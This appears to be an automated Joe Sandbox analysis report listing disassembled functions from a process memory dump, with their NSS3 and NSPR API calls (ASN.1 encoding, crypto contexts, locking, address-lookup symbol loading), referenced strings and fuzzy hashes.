SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6D62A1A8), ref: 6D51422D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: c2cc5d9b1f214dd5fd4f6f38cbefa6eee77d751b7688ed16935e2ff65ccb2b8f
Instruction ID: cfc5b39339af6aaa5cfdfdf97ab371fe698df527af7540e2c4ffeed2ab5a28e6
Opcode Fuzzy Hash: c2cc5d9b1f214dd5fd4f6f38cbefa6eee77d751b7688ed16935e2ff65ccb2b8f
Instruction Fuzzy Hash: 605139B5A4C3016BF7189A25EC41F3776DCDF9834CF054929EA5AC7A82FB31E8108662

Function 6D558E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6D558E01,00000000,6D559060,6D660B64), ref: 6D558E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6D558E01,00000000,6D559060,6D660B64), ref: 6D558E9E
PORT_ArenaAlloc_Util.NSS3(6D660B64,00000001,?,?,?,?,6D558E01,00000000,6D559060,6D660B64), ref: 6D558EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6D558E01,00000000,6D559060,6D660B64), ref: 6D558EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6D558E01,00000000,6D559060,6D660B64), ref: 6D558ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6D558E01,00000000,6D559060,6D660B64), ref: 6D558EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6D558E01), ref: 6D558EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6D660B64,6D660B64), ref: 6D558F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6D558F3F

Part of subcall function 6D55A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6D55A421,00000000,00000000,6D559826), ref: 6D55A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6D55904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6D558E76

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: e620556bb0006bdfc6e551c6c85d8069f49cd4b00e3398951fb050e2e612283a
Instruction ID: 40d581fa792a6dd5a5a7468047fe660166876fce4b01e57ccd9b2edba78472f3
Opcode Fuzzy Hash: e620556bb0006bdfc6e551c6c85d8069f49cd4b00e3398951fb050e2e612283a
Instruction Fuzzy Hash: 1E61EFB9D041069BDB09CF65CC80ABFBBB9FF88315F154929DD18A3711E735A921CBA0

Function 6D508E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D508E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6D508E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D508EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6D6318D0,?), ref: 6D508F03
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D508F19
PL_FreeArenaPool.NSS3(?), ref: 6D508F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D508F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6D508F65
PL_FinishArenaPool.NSS3(?), ref: 6D508FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6D508FFE
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D509012
PL_FreeArenaPool.NSS3(?), ref: 6D509024
PL_FinishArenaPool.NSS3(?), ref: 6D50902C
PORT_DestroyCheapArena.NSS3(?), ref: 6D50903E

Strings

security, xrefs: 6D508EE7

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: fb23ceb587124c047efeada3298ffd7f009e52d3084739e1914ae8b095ee295f
Instruction ID: 78666614fc8634159a07c052c19efba7e583e96394acb43f666f08e802e87181
Opcode Fuzzy Hash: fb23ceb587124c047efeada3298ffd7f009e52d3084739e1914ae8b095ee295f
Instruction Fuzzy Hash: 5E5137B150C340ABD718AE289C40F7B7BA8AFC9798F454C2DFA4593651E771DD0487A3

Function 6D5CCD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D5CCC7B), ref: 6D5CCD7A

Part of subcall function 6D5CCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6D53C1A8,?), ref: 6D5CCE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D5CCDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D5CCDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6D5CCDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D5CCD8E

Part of subcall function 6D4F05C0: PR_EnterMonitor.NSS3 ref: 6D4F05D1
Part of subcall function 6D4F05C0: PR_ExitMonitor.NSS3 ref: 6D4F05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6D5CCDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D5CCDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D5CCE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D5CCE29
PR_UnloadLibrary.NSS3(00000000), ref: 6D5CCE48

Strings

getnameinfo, xrefs: 6D5CCDB2, 6D5CCE23
freeaddrinfo, xrefs: 6D5CCD9F, 6D5CCE10
getaddrinfo, xrefs: 6D5CCD88, 6D5CCDF9
wship6.dll, xrefs: 6D5CCDE3
ws2_32.dll, xrefs: 6D5CCD75

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 017feb5e9c258364c10baf2cbeb71c3c08068db11df617cc5935f2e317a40f1e
Instruction ID: 8eeb8d8a6441bd08e37fe97ac206ccbb798302831a96b33227e06cdee99ebf65
Opcode Fuzzy Hash: 017feb5e9c258364c10baf2cbeb71c3c08068db11df617cc5935f2e317a40f1e
Instruction Fuzzy Hash: B11129E9D595A213D705CAB76C00F7A39985B8320CF06543DEA06D2611FB28CA4686F3

Function 6D611C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6D6113BC,?,?,?,6D611193), ref: 6D611C6B
PR_NewLock.NSS3(?,6D611193), ref: 6D611C7E

Part of subcall function 6D5C98D0: calloc.MOZGLUE(00000001,00000084,6D4F0936,00000001,?,6D4F102C), ref: 6D5C98E5

PR_NewCondVar.NSS3(00000000,?,6D611193), ref: 6D611C91

Part of subcall function 6D4EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6D4F21BC), ref: 6D4EBB8C

PR_NewCondVar.NSS3(00000000,?,?,6D611193), ref: 6D611CA7

Part of subcall function 6D4EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6D4EBBEB
Part of subcall function 6D4EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6D4EBBFB
Part of subcall function 6D4EBB80: GetLastError.KERNEL32 ref: 6D4EBC03
Part of subcall function 6D4EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6D4EBC19
Part of subcall function 6D4EBB80: free.MOZGLUE(00000000), ref: 6D4EBC22

PR_NewCondVar.NSS3(00000000,?,?,?,6D611193), ref: 6D611CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6D611193), ref: 6D611CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6D611193), ref: 6D611CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6D611193), ref: 6D611D1A

Part of subcall function 6D5C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D4F1A48), ref: 6D5C9BB3
Part of subcall function 6D5C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D4F1A48), ref: 6D5C9BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6D611193), ref: 6D611D3D

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6D611193), ref: 6D611D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6D611193), ref: 6D611D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6D611193), ref: 6D611D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6D611193), ref: 6D611D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6D611193), ref: 6D611D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6D611193), ref: 6D611D93
PR_DestroyLock.NSS3(00000000,?,?,6D611193), ref: 6D611D9F
free.MOZGLUE(00000000,?,6D611193), ref: 6D611DA8

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 2b2ef63970f50e59014c54a1444bd0c60240c2063a01ccae726cb5cd98539c22
Instruction ID: e57d036e303d2dcaae980676d607711425a86f6469d30db45ebeecb4528f5816
Opcode Fuzzy Hash: 2b2ef63970f50e59014c54a1444bd0c60240c2063a01ccae726cb5cd98539c22
Instruction Fuzzy Hash: 8831F5F5D047029FE720CF69AC41A6B7AF4AF55649B054438EA4AC7B11FB35E804CB92

Function 6D570C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,Wm), ref: 6D570C81

Part of subcall function 6D55BE30: SECOID_FindOID_Util.NSS3(6D51311B,00000000,?,6D51311B,?), ref: 6D55BE44

Part of subcall function 6D548500: SECOID_GetAlgorithmTag_Util.NSS3(6D5495DC,00000000,00000000,00000000,?,6D5495DC,00000000,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D548517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D570CC4

Part of subcall function 6D55FAB0: free.MOZGLUE(?,-00000001,?,?,6D4FF673,00000000,00000000), ref: 6D55FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D570CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6D570D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6D570D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6D570D7D
free.MOZGLUE(00000000), ref: 6D570DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D570DC1
free.MOZGLUE(00000000), ref: 6D570DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D570E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D570E0F

Part of subcall function 6D5495C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D5495E0
Part of subcall function 6D5495C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6D527F4A,00000000,?,00000000,00000000), ref: 6D5495F5
Part of subcall function 6D5495C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6D549609
Part of subcall function 6D5495C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D54961D
Part of subcall function 6D5495C0: PK11_GetInternalSlot.NSS3 ref: 6D54970B
Part of subcall function 6D5495C0: PK11_FreeSymKey.NSS3(00000000), ref: 6D549756
Part of subcall function 6D5495C0: PK11_GetIVLength.NSS3(?), ref: 6D549767
Part of subcall function 6D5495C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6D54977E
Part of subcall function 6D5495C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D54978E

Strings

*,Wm, xrefs: 6D570DCC
*,Wm, xrefs: 6D570C69, 6D570DE0, 6D570C80, 6D570C8B, 6D570CAF
-$Wm, xrefs: 6D570C64

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,Wm$*,Wm$-$Wm
API String ID: 3136566230-109285480
Opcode ID: 02ee4f99fe252098f8e9824235b99bf96cef693078dbb0b8bbd56de752d6740b
Instruction ID: 1a949324eff4fc091ea70f2f6e6f103a9af917589fe30a77196f85f402454632
Opcode Fuzzy Hash: 02ee4f99fe252098f8e9824235b99bf96cef693078dbb0b8bbd56de752d6740b
Instruction Fuzzy Hash: 554113B1900206ABEB199F6ADC45BBF76B4AF80308F114525EA1557641E732EE10CBE2

Function 6D565CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6D565EC0,00000000,?,?), ref: 6D565CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6D565CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6D565CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6D565D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6D565EC0,00000000,?,?), ref: 6D565D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6D565D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D565D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D565D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6D565D80

Strings

multiaccess:, xrefs: 6D565CB8
sql:, xrefs: 6D565CD1, 6D565D36
NSS_DEFAULT_DB_TYPE, xrefs: 6D565D1A
extern:, xrefs: 6D565CEA, 6D565D4B
dbm:, xrefs: 6D565D03, 6D565D60

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: e9052b612e81df7472e669064fc43c7b5fd469bbbc7e8d6a1558a628845b231d
Instruction ID: d30043a3795ebab1ad284edeb569a7bfd829df9df1cf6d10ef300d28dacde060
Opcode Fuzzy Hash: e9052b612e81df7472e669064fc43c7b5fd469bbbc7e8d6a1558a628845b231d
Instruction Fuzzy Hash: D131D4F0A803C2ABE7164A25DC49B363778AF06248F058430EE56A76D3EBB1D651C2B5

Function 6D566CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6D631DE0,?), ref: 6D566CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D566D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6D566D70
PORT_Alloc_Util.NSS3(00000480), ref: 6D566D82
DER_GetInteger_Util.NSS3(?), ref: 6D566DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D566DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6D566E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6D566F19
PK11_DigestBegin.NSS3(00000000), ref: 6D566F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6D566F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D567011
PK11_FreeSymKey.NSS3(00000000), ref: 6D567033
free.MOZGLUE(?), ref: 6D56703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6D567060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6D567087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6D5670AF

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 04c8a90b871411518ae6ba300c0d8b8b9b2f6817e935f5684a0fe1df59d230fd
Instruction ID: e56c1a766b9956d686e5508ad03ef2839e89c3a78daf16d3340ceda9a91f8f37
Opcode Fuzzy Hash: 04c8a90b871411518ae6ba300c0d8b8b9b2f6817e935f5684a0fe1df59d230fd
Instruction Fuzzy Hash: 22A116719083829BEB088B34CC50B7B72A4EB81318F148D79E919CBAA5E775DC4487F3

Function 6D52AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6D50AB95,00000000,?,00000000,00000000,00000000), ref: 6D52AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6D50AB95,00000000,?,00000000,00000000,00000000), ref: 6D52AF39
PR_Unlock.NSS3(?,?,?,6D50AB95,00000000,?,00000000,00000000,00000000), ref: 6D52AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6D50AB95,00000000,?,00000000,00000000,00000000), ref: 6D52AF69
TlsGetValue.KERNEL32 ref: 6D52B06B
EnterCriticalSection.KERNEL32(?), ref: 6D52B083
PR_Unlock.NSS3(?), ref: 6D52B0A4
TlsGetValue.KERNEL32 ref: 6D52B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6D52B0D9
PR_Unlock.NSS3 ref: 6D52B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D52B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D52B182

Part of subcall function 6D55FAB0: free.MOZGLUE(?,-00000001,?,?,6D4FF673,00000000,00000000), ref: 6D55FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6D52B177

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6D50AB95,00000000,?,00000000,00000000,00000000), ref: 6D52B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6D50AB95,00000000,?,00000000,00000000,00000000), ref: 6D52B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6D50AB95,00000000,?,00000000,00000000,00000000), ref: 6D52B1C2

Part of subcall function 6D551560: TlsGetValue.KERNEL32(00000000,?,6D520844,?), ref: 6D55157A
Part of subcall function 6D551560: EnterCriticalSection.KERNEL32(?,?,?,6D520844,?), ref: 6D55158F
Part of subcall function 6D551560: PR_Unlock.NSS3(?,?,?,?,6D520844,?), ref: 6D5515B2

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: f67375c3f9acbd44555fd0ace3f6c2769b6c31cfaebf0e5030510b059736b119
Instruction ID: 32e2d426091e3b134250a484603433a96af4e9db8702f9d1526edf1a82af494e
Opcode Fuzzy Hash: f67375c3f9acbd44555fd0ace3f6c2769b6c31cfaebf0e5030510b059736b119
Instruction Fuzzy Hash: E6A1F2B5C042069BEF05DF64DC81BBE77B4FF88308F054425EA05A7691E731E995CBA2

Function 6D522C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?Rm,?,6D51E477,?,?,?,00000001,00000000,?,?,6D523F23,?), ref: 6D522C62
EnterCriticalSection.KERNEL32(0000001C,?,6D51E477,?,?,?,00000001,00000000,?,?,6D523F23,?), ref: 6D522C76
PL_HashTableLookup.NSS3(00000000,?,?,6D51E477,?,?,?,00000001,00000000,?,?,6D523F23,?), ref: 6D522C86
PR_Unlock.NSS3(00000000,?,?,?,?,6D51E477,?,?,?,00000001,00000000,?,?,6D523F23,?), ref: 6D522C93

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6D51E477,?,?,?,00000001,00000000,?,?,6D523F23,?), ref: 6D522CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6D51E477,?,?,?,00000001,00000000,?,?,6D523F23,?), ref: 6D522CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6D51E477,?,?,?,00000001,00000000,?,?,6D523F23), ref: 6D522CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6D51E477,?,?,?,00000001,00000000,?), ref: 6D522CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6D51E477,?,?,?,00000001,00000000,?), ref: 6D522D4D
EnterCriticalSection.KERNEL32(?), ref: 6D522D61
